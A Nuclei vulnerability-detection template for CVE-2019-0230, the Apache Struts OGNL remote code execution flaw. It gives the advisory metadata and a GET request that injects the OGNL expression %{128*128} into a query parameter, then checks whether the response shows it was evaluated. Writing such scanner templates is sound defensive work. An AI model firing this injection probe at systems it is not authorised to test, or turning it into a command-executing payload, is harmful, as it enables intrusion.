id: CVE-2019-0230 info: name: Apache Struts RCE author: geeknik severity: critical description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. reference: - https://cwiki.apache.org/confluence/display/WW/S2-059 - https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-0230 cwe-id: CWE-915 tags: struts,rce,cve,cve2019,apache requests: - method: GET path: - "{{BaseURL}}/?id=nuclei%25{128*128}" matchers: - type: word words: - "nuclei16384"